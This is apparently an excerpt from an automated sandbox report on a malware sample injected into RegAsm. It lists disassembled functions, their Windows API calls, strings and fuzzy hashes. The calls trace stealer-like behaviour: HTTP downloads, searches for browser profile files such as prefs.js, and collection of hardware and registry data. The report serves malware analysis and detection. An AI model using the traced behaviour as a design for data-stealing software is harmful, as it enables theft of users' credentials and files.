                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologlstrlen
                                              • String ID: ERROR
                                              • API String ID: 2133942097-2861137601
                                              • Opcode ID: e3862efabba6fd3aa4cb9b0dfabe18203077d688197a51beacfc05973109fac0
                                              • Instruction ID: 09d7b8649eec1aba69f550ff712d81861b05611d9dfb7d22293232c2b9b15471
                                              • Opcode Fuzzy Hash: e3862efabba6fd3aa4cb9b0dfabe18203077d688197a51beacfc05973109fac0
                                              • Instruction Fuzzy Hash: 81319271900248AFDB00EFB9D946BDD7FB4AF15348F10805EF505A7292DB789AC8CBA5
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00413DAF
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
                                                • Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
                                                • Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
                                                • Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
                                                • Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
                                                • Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
                                                • Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
                                                • Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
                                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413E0D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: HttpInternet$H_prologOpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                              • String ID: ERROR$ERROR
                                              • API String ID: 1120091252-2579291623
                                              • Opcode ID: 03178ecd0bbec6affdaebb525db545611335bf35cc31f130a7744cc9edddcb0a
                                              • Instruction ID: 925112e8e41893d263a36a0715b695f32bbcd4bc231054056fb3929ceaa78f2b
                                              • Opcode Fuzzy Hash: 03178ecd0bbec6affdaebb525db545611335bf35cc31f130a7744cc9edddcb0a
                                              • Instruction Fuzzy Hash: 8F216874900289EEDB04FFB5C6567DD7BB4AF14308F50414EE855A32C2DBB85B88CBA6
                                              APIs
                                              • OpenProcess.KERNEL32(00000410,00000000,`]A), ref: 00411E01
                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411E1C
                                              • CloseHandle.KERNEL32(00000000), ref: 00411E23
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                              • String ID: `]A
                                              • API String ID: 3183270410-3109568557
                                              • Opcode ID: 873addd8e11ebcb9b6fa5a143eef055e3a12e3cdeb96587028471bad27355f2c
                                              • Instruction ID: d3e1dd0c58b219822338ecefe3d53cfe5b76f578e3df3734baccaf80f874c1ca
                                              • Opcode Fuzzy Hash: 873addd8e11ebcb9b6fa5a143eef055e3a12e3cdeb96587028471bad27355f2c
                                              • Instruction Fuzzy Hash: BEF03079501228BBDB20AF90DC49FDA3B68AB06755F004051FB45AA190DBB4AAC48B98
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 0041418C: _EH_prolog.MSVCRT ref: 00414191
                                              • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 004158EE
                                              • CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$CreateObjectSingleSleepThreadWait
                                              • String ID:
                                              • API String ID: 2678630583-0
                                              • Opcode ID: 8e1d1776afbd9a22a71f00cc1e13e4711f724deee7536dfb02ff93f4a3924dc5
                                              • Instruction ID: 566a806ed45ed7d57017c216d34a8c4ffee44fa122edaa9fab7e1248d97843d8
                                              • Opcode Fuzzy Hash: 8e1d1776afbd9a22a71f00cc1e13e4711f724deee7536dfb02ff93f4a3924dc5
                                              • Instruction Fuzzy Hash: 2E315E75901248EFCB01EFE5C985ADEBBB8FF15304F10452BF912A7281DB786A88CB54
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000001,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042784C), ref: 00410C14
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,0042784C,00000000,?), ref: 00410C1B
                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 00410C39
                                              • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,?,?,?,0041636A,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 00410C55
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocOpenProcessQueryValue
                                              • String ID:
                                              • API String ID: 3676486918-0
                                              • Opcode ID: a3efb0290534fed42956b3759a871576bf8bd94dfe04cecd53c755e9a7ae7a27
                                              • Instruction ID: efee1238177d1e62ffebd9e5451e91450718c70c7da02a0731e5fcf44662af9a
                                              • Opcode Fuzzy Hash: a3efb0290534fed42956b3759a871576bf8bd94dfe04cecd53c755e9a7ae7a27
                                              • Instruction Fuzzy Hash: 64F05E79240204FFFB105B90EE0EFAA7F7EEB4AB04F101024F701EA1A0D7B199909B60
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 6%@$6%@
                                              • API String ID: 0-3369382886
                                              • Opcode ID: 920e5108120121350582ecc535b242215f59501578f0843988e976ed812f419f
                                              • Instruction ID: 85184098a441143994ddd9e9821d7a0cbd4c96e680ae7f57629a95d14e4869ef
                                              • Opcode Fuzzy Hash: 920e5108120121350582ecc535b242215f59501578f0843988e976ed812f419f
                                              • Instruction Fuzzy Hash: 014124715006199FCB01CF69D8806EDBBA1FF89318F1484BADD55EB391C27869828B54
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00413114
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00404DCA: _EH_prolog.MSVCRT ref: 00404DCF
                                                • Part of subcall function 00404DCA: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E1E
                                                • Part of subcall function 00404DCA: StrCmpCA.SHLWAPI(?), ref: 00404E38
                                                • Part of subcall function 00404DCA: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E5C
                                                • Part of subcall function 00404DCA: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E7D
                                                • Part of subcall function 00404DCA: InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00404EC8
                                                • Part of subcall function 00404DCA: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EE2
                                                • Part of subcall function 00404DCA: InternetCloseHandle.WININET(00000000), ref: 00404EE9
                                                • Part of subcall function 00404DCA: InternetCloseHandle.WININET(?), ref: 00404EF2
                                                • Part of subcall function 00404DCA: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00404EA4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                              • String ID: B
                                              • API String ID: 1244342732-1255198513
                                              • Opcode ID: 8814104713a5359509c69fafaa93134142e4c2b69244bb657f1e51804ccee6cb
                                              • Instruction ID: 59e248d9ab1f70b61ff4e3718412ae05cd91961b7bb0589921f313693a55ba95
                                              • Opcode Fuzzy Hash: 8814104713a5359509c69fafaa93134142e4c2b69244bb657f1e51804ccee6cb
                                              • Instruction Fuzzy Hash: 2252933090528DEEDF09E7E4C955BDDBBB46F19308F10419EE445632C2DBB82B88DB66
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040C549
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00411AC5: _EH_prolog.MSVCRT ref: 00411ACA
                                                • Part of subcall function 00411AC5: GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 0040C0F8: _EH_prolog.MSVCRT ref: 0040C0FD
                                                • Part of subcall function 0040C0F8: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00426FC0,?,?,00426C9E,?,00000000,?), ref: 0040C17C
                                                • Part of subcall function 0040C0F8: StrCmpCA.SHLWAPI(?,00426FC4,?,00000000,?), ref: 0040C1A0
                                                • Part of subcall function 0040C0F8: StrCmpCA.SHLWAPI(?,00426FC8,?,00000000,?), ref: 0040C1BA
                                                • Part of subcall function 0040C0F8: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00426FCC,?,?,00426C9F,?,00000000,?), ref: 0040C256
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$lstrcpy$Filelstrcat$AttributesFindFirstFolderPathlstrlen
                                              • String ID: \..\
                                              • API String ID: 3962007143-4220915743
                                              • Opcode ID: 972936fd4ca28be990a2c1efe6d580bd0263635e134d0897410b594295188a3c
                                              • Instruction ID: 2e5ccd1417ed516fe774db8f5d88769767b5b31b0c0a0e1711a7f23a3da91977
                                              • Opcode Fuzzy Hash: 972936fd4ca28be990a2c1efe6d580bd0263635e134d0897410b594295188a3c
                                              • Instruction Fuzzy Hash: B1A19371C00249EACF04FBE5C956BDDBFB4AF19308F14415EE455632C2DBB82788CAA6
                                              APIs
                                              • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,004069D5), ref: 00406925
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-3916222277
                                              • Opcode ID: 2071e6830b414a4f6cef92ce782cc4aedde8b680b170233ca3d758ebf0a37cf1
                                              • Instruction ID: 2bb437bd1ab98ec78e1b4bc8873721ae5078494fa6c4fcc2ce59f946fd7ad518
                                              • Opcode Fuzzy Hash: 2071e6830b414a4f6cef92ce782cc4aedde8b680b170233ca3d758ebf0a37cf1
                                              • Instruction Fuzzy Hash: C111C1B2505219EBEB20DF88C9447AAB3E4FB04340F214426DA43E76C0DB38DE65EB59
                                              APIs
                                              • SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPathlstrcpy
                                              • String ID: lB
                                              • API String ID: 1699248803-3047919755
                                              • Opcode ID: 1ae8f98ee9e729e1ddff228a959d1a35324e12a5528342133f23c9e6784e87e3
                                              • Instruction ID: 6d156bbd15641d4f05e1eec19e6e07659e45023dd103e522504a723fedf63199
                                              • Opcode Fuzzy Hash: 1ae8f98ee9e729e1ddff228a959d1a35324e12a5528342133f23c9e6784e87e3
                                              • Instruction Fuzzy Hash: 3EF01C7991014CABDB11DF64C8909EDB7FDEBC4704F0081A6E90593280D630AF469F50
                                              APIs
                                              • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041129B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CurrentProfile
                                              • String ID: Unknown
                                              • API String ID: 2104809126-1654365787
                                              • Opcode ID: d286955b6b6d2818e5943dc477cbecc87358c8a6ca35039e00e2229326ca538d
                                              • Instruction ID: 2b952d0626d81962cc3d2d1ea7a3e6cd08e9a3b4f271edb1dc8cbbe1ffc1582d
                                              • Opcode Fuzzy Hash: d286955b6b6d2818e5943dc477cbecc87358c8a6ca35039e00e2229326ca538d
                                              • Instruction Fuzzy Hash: 99E08C30A00208ABCB10DFA4E885FE977BC6B04348F504016ED01E2180DA78E64A8B69
                                              Strings
                                              • failed to allocate %u bytes of memory, xrefs: 1B6B04E7
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true
                                              • Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: failed to allocate %u bytes of memory
                                              • API String ID: 0-1168259600
                                              • Opcode ID: c7664f8e2f4503e1152f4ca5d59101a784271de759b8033640b986b60141fc0f
                                              • Instruction ID: ebf42fd3e60c064533bee3aa66fa97190ca4707749fa11b5c13556e77caa8eda
                                              • Opcode Fuzzy Hash: c7664f8e2f4503e1152f4ca5d59101a784271de759b8033640b986b60141fc0f
                                              • Instruction Fuzzy Hash: DBD012A6E89322A3CE121690BC02ACE7E514BB46A1F064034FD8C5A320D565AD9183D6
                                              APIs
                                              • LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413F3B,00000000,00000000), ref: 00411B6E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
